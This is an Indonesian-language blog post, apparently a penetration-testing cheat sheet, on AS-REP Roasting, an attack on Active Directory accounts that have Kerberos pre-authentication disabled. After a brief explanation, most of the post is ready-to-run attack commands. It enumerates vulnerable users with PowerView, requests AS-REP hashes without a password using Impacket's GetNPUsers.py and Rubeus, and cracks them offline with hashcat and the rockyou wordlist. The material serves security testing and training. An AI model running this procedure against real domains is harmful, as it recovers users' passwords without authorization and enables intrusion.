Post

[Kerberos] AS-REP Roasting

ASREP Roasting adalah teknik lain yang bisa digunakan untuk mengeksploitasi cara Kerberos bekerja. Teknik ini bisa digunakan kepada pengguna yang tidak mengaktifkan Kerberos pre-authentication.

AS-REP Roasting

Pre-authentication adalah metode yang digunakan oleh Kerberos untuk mengonfirmasi identitas pengguna sebelum mengeluarkan Ticket Granting Ticket (TGT).

Jika pre-authentication dinonaktifkan, ini berarti bahwa siapa pun dapat meminta Authentication Service Response (AS-REP) untuk pengguna tersebut, dan tiket tersebut di-crack secara offline untuk mendapatkan password plaintext-nya.

0x1 - Exploitation Stages

Step 1: ASREPRoastable Enumeration

Seperti halnya kerberoasting, kita tidak ingin melakukan asreproast pada setiap akun di domain.

1
2
3
# Enumerasi ASREPRoastable menggunakan PowerView
PS > . .\PowerView.ps1
PS > Get-NetUser -PreauthNotRequired

Step 2: ASREP Roasting

A. Impacket

1
2
# Remote, hanya membutuhkan username (tanpa password)
➜ GetNPUsers.py <domain>/ -usersfile <users.txt> -format <hashcat|john> -outputfile <output.txt> -no-pass -dc-ip

B. Rubeus

1
PS > Rubeus.exe asreproast /user:squid_svc /nowrap

0x2 - Crack the Ticket

1
➜ hashcat -m 18200 pass.hash /usr/share/wordlists/rockyou.txt

0x3 - References

  • https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/
  • https://akimbocore.com/article/asrep-roasting/
This post is licensed under CC BY 4.0 by the author.